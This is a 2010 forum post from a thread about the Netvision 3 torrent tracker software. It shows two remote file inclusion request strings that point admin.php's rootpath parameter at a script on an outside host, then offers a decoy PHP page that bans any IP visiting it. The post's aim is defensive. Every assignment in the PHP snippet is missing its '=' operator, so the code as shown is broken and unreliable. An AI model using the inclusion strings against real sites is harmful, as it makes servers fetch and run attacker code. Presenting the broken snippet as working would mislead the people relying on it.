Thread: Netvision 3
View Single Post
  #4  
Old 4th April 2010, 13:11
hellix's Avatar
hellix hellix is offline
Senior Member
 
Join Date: Oct 2008
Lithuania
Posts: 20
Default
joke addon like

Code:
admin.php?rootpath=http://www.luomoeillegno.com/extras/idxx.txt??    
/%20%20/admin.php?rootpath=http://www.luomoeillegno.com/extras/idxx.txt??
new file admin.php or admincp.php or...............

PHP Code:
<?
require_once("include/bittorrent.php");
dbconn();
$ip ip2long(htmlspecialchars($_SERVER['REMOTE_ADDR']));
$added =get_date_time();
$addedby "1";
$comment "Admin panel attack";
$sql "INSERT INTO ban (added, addedby, ip, comment) VALUES ('$added','$addedby','$ip','$comment')";
$result mysql_query($sql);
header("Location: $BASEURL/index.php");
?>

Last edited by hellix; 28th April 2010 at 22:13.
Reply With Quote
The Following 3 Users Say Thank You to hellix For This Useful Post:
Fynnon (27th June 2010), mymihai (5th April 2010), YsE (6th April 2010)